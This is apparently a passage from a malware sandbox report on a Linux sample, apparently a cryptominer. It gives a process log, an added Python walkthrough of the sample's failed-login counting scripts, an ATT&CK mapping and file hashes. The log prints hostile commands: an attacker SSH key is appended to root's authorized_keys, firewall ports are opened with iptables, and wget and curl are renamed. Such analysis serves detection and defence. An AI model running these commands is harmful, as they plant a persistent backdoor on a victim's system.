            [1794] /usr/bin/chmod: chmod 600 /root/.ssh/authorized_keys
        [1795] /usr/bin/sh: sh -c "echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911\" >> /root/.ssh/authorized_keys"  {Adds new SSH keys}
        [1796] /usr/bin/sh: sh -c "iptables -I INPUT -p tcp --dport 8013 -j ACCEPT"
        [1797] /usr/bin/sh: sh -c "iptables -I OUTPUT -p tcp --sport 8013 -j ACCEPT"  {System Network Configuration Discovery}
        [1798] /usr/bin/sh: sh -c "iptables -I PREROUTING -t nat -p tcp --dport 8013 -j ACCEPT"
        [1799] /usr/bin/sh: sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 8013 -j ACCEPT"  {System Network Configuration Discovery}
        [1800] /bin/sh: sh -c "iptables -I INPUT -p udp --dport 41736 -j ACCEPT"
        [1801] /usr/bin/sh: sh -c "ulimit -n"
        [1803] /bin/sh: sh -c "iptables -I OUTPUT -p udp --sport 41736 -j ACCEPT"  {System Network Configuration Discovery}
        [1804] /bin/sh: sh -c "iptables -I PREROUTING -t nat -p udp --dport 41736 -j ACCEPT"
        [1805] /usr/bin/getent: getent passwd 0
        [1806] /bin/sh: sh -c "iptables -I POSTROUTING -t nat -p udp --sport 41736 -j ACCEPT"  {System Network Configuration Discovery}
        [1817] /usr/bin/getent: getent passwd 0
        [1818] /usr/bin/getent: getent passwd 0
        [1824] /usr/bin/getent: getent passwd 0
        [1825] /usr/bin/getent: getent passwd 0
        [1826] /usr/bin/getent: getent passwd 0
[1747] /usr/bin/mv: mv /usr/bin/wget /usr/bin/wget1
[1749] /usr/bin/mv: mv /usr/bin/curl /usr/bin/curl1
[1761] /tmp/secure.sh: /tmp/secure.sh  {Executes dropped EXE}
    [1766] /usr/bin/date: date "+%b %e %H"
    [1771] /usr/bin/grep: grep "Dec 3 23" /var/log/secure
    [1772] /usr/bin/grep: grep Failed
    [1773] /usr/bin/awk: awk "{print \$(NF-3)}"
    [1774] /usr/bin/sort: sort
    [1775] /usr/bin/uniq: uniq -c
    [1776] /usr/bin/awk: awk "\$1>\"\$LIMIT\"{print \$1\":\"\$2}"
    [1780] /usr/bin/sleep: sleep 60
[1769] /tmp/auth.sh: /tmp/auth.sh  {Executes dropped EXE}
    [1778] /usr/bin/date: date "+%b %e %H"
    [1784] /usr/bin/grep: grep "Dec 3 23" /var/log/auth.log
    [1785] /usr/bin/grep: grep Failed
    [1786] /usr/bin/awk: awk "{print \$(NF-3)}"
    [1787] /usr/bin/sort: sort
    [1788] /usr/bin/uniq: uniq -c
    [1789] /usr/bin/awk: awk "\$1>\"\$LIMIT\"{print \$1\":\"\$2}"
    [1792] /usr/bin/sleep: sleep 60
[1782] /usr/bin/cp: cp -R /tmp/auth.sh /tmp/config.json /tmp/gdm3-config-err-n2WIav /tmp/secure.sh /tmp/snap-private-tmp /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-ECrg2q /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar /tmp/work32 /tmp/xmr /usr/.work/
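The two dropped scripts, /tmp/secure.sh (PID 1761, reading /var/log/secure) and /tmp/auth.sh (PID 1769, reading /var/log/auth.log), run the same pipeline once a minute: `date "+%b %e %H"` gives the syslog prefix of the current hour, the two greps keep this hour's "Failed" lines, `awk '{print $(NF-3)}'` pulls the source address out of sshd's "Failed password for ... from ADDR port N ssh2", and `sort | uniq -c` counts per address. The last awk stage reached the process with the literal text `$LIMIT` still in its program (visible in the command line above), so awk compares the count with the string "$LIMIT" instead of a number. The script below is an added example, not the sample's code: it reimplements the pipeline over a constructed auth.log excerpt (not from the report), once with the numeric threshold the stage was presumably meant to apply and once exactly as it ran, so the difference is visible.

```python
from collections import Counter
from datetime import datetime

# Constructed /var/log/auth.log excerpt in Ubuntu's syslog layout (not taken from the report).
SAMPLE_AUTH_LOG = """\
Dec  3 22:59:59 u911 sshd[1401]: Failed password for root from 198.51.100.23 port 39990 ssh2
Dec  3 23:51:02 u911 sshd[1450]: Failed password for root from 203.0.113.7 port 51122 ssh2
Dec  3 23:51:05 u911 sshd[1450]: Failed password for root from 203.0.113.7 port 51122 ssh2
Dec  3 23:51:09 u911 sshd[1452]: Failed password for invalid user admin from 203.0.113.7 port 51130 ssh2
Dec  3 23:52:41 u911 sshd[1460]: Failed password for invalid user test from 198.51.100.23 port 40010 ssh2
Dec  3 23:53:00 u911 sshd[1466]: Accepted publickey for root from 192.0.2.10 port 33004 ssh2: RSA SHA256:c0ffee
Dec  3 23:54:10 u911 CRON[1500]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# The report's submission time, used as "now" for the offline run.
SAMPLE_NOW = datetime(2024, 12, 3, 23, 54)


def hour_prefix(now: datetime) -> str:
    """What `date "+%b %e %H"` prints: month, space-padded day, hour; the prefix of this hour's syslog lines."""
    return f"{now:%b} {now.day:2d} {now:%H}"


def failed_logins_by_source(log_text: str, hour: str) -> Counter:
    """grep "<hour>" | grep Failed | awk '{print $(NF-3)}' | sort | uniq -c, as a Counter keyed by source address."""
    counts = Counter()
    for line in log_text.splitlines():
        if line.startswith(hour) and "Failed" in line:
            fields = line.split()
            counts[fields[-4]] += 1        # awk $(NF-3): the address in sshd's "... from ADDR port N ssh2"
    return counts


def sources_over_limit(log_text: str, hour: str, limit: int) -> dict:
    """The intended final stage: keep sources whose count exceeds a numeric limit."""
    return {src: n for src, n in failed_logins_by_source(log_text, hour).items() if n > limit}


def sources_over_limit_as_run(log_text: str, hour: str) -> dict:
    """
    The final stage as it actually reached awk in the sandbox: the program text still contains the
    literal characters $LIMIT (the shell never expanded the variable), which makes awk compare strings.
    Every count starts with a digit and every digit sorts after '$', so nothing is filtered out.
    """
    return {src: n for src, n in failed_logins_by_source(log_text, hour).items() if str(n) > "$LIMIT"}


if __name__ == "__main__":
    hour = hour_prefix(SAMPLE_NOW)
    print("intended (limit 2):", sources_over_limit(SAMPLE_AUTH_LOG, hour, 2))
    print("as run:            ", sources_over_limit_as_run(SAMPLE_AUTH_LOG, hour))
```

What the scripts do with the resulting address list is not visible in this run (the sleep 60 loop is the only thing after the awk), so the example stops at the counting; the same per-source counter is also a reasonable starting point for your own SSH brute-force alerting, provided the threshold is compared as a number.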
Network
MITRE ATT&CK Enterprise v15

Persistence
  Account Manipulation (1): SSH Authorized Keys (1)
  Scheduled Task/Job (1): Cron (1)
Privilege Escalation
  Account Manipulation (1): SSH Authorized Keys (1)
  Scheduled Task/Job (1): Cron (1)
Defense Evasion
  File and Directory Permissions Modification (1): Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (2): System Checks (2)
Downloads

Filesize: 419B
MD5: ed583c5e843c91d8fd0752e56ccacbde
SHA1: 29ded7c69c93262842b8793d3a99868d8118364e
SHA256: 442e897c78532dd4e36fa1c7fd791c4bcf19b230d9aab3d5d12ade2d98b84a83
SHA512: 057e123d626a9cc2d5181707169e3636844856db721cd34d181712a16724538df4360d054af87b1b58505b78702fdce57836d340bab8af56c5173e9c0c735a5f

Filesize: 1KB
MD5: 2a669d95673bc6d238399132dcf52e61
SHA1: 7497b198b549a139b3c32bffa65c3e15885b0ff2
SHA256: b1a4c0d08ad2b8625e5a111ff70d88d0bcf4f7d712b5e7ab72747622431df18f
SHA512: 152285fd8f28c8dafd0dd3f2320b3258cbb6b621707de7486efdee710c7dcbb87fb716b181d3b4b1ac73376a3b4cb618d56d6a90213c5cbfa77a853fe9b60233

Filesize: 417B
MD5: b2c87016390044ebd32dcb8c52dfd8f3
SHA1: 5a246aa26f208d4c3d9f512e0f1777bc51cae68e
SHA256: 904f2c1bc6b48ba663b9186b7b04905a33af3d55afb9995802daadab83da2a15
SHA512: 9375bc9e0c0049baac8247a58526cc727e8452ec831e7abd39864a2de549cb36136ba2ff154428e2a9370ec7adfeda63d6d9bd9fa7158fc5eae852f8b035173e

Filesize: 1.2MB
MD5: 20552242cd4b5e8fa6071951e9f4bf6d
SHA1: 95f8891ab0169ee8c51c39de0d3f0b974091e8fa
SHA256: 86f0e4c7596a7ac30af4152ce86268b109c325f62a7cfe1be0dbc72de0d9279a
SHA512: 1637b6742045baa9f8f16dbe5afa535324dec97abc3c5d37679c2ccca30f842ea80cbecb315925bcfce20f84dfdef4a7a978dc1986f26b9f9698665ef30e1c3a

Filesize: 4.2MB
MD5: 06e1f988471336d788da0fcaa29ed50b
SHA1: 2fa461cd8f0614dfb86f845aef47c42910370b00
SHA256: 7f28b2791ad94a202eea5e4c91d47cdeadca4723723427af574519f8aedbf15e
SHA512: 4ed849872ad844df311fa5e80246b143d76c1b0a432e9d38771e8a66fa42f71a683b52e41a8e3fbdd090152088c96176bdf6820478ceb5b5ab9f77284336b180

Filesize: 34B
MD5: 421de1a0dc2f268bd3aa5f563eff3901
SHA1: eadf89c04673ae58d44bc8d02471c0fbf66e747e
SHA256: 888cf94f41403c7181b3ee7afb94278246f57b2d1b3cf078853d6ef447c2379a
SHA512: 7285223424cd7cebb5246c5f4410d4f43da83be4ed1870c9adcec58d6c650bb4d0044f806b99514f2651818cbc406479760747fcfe03c33b315d4f9a4b52d4b5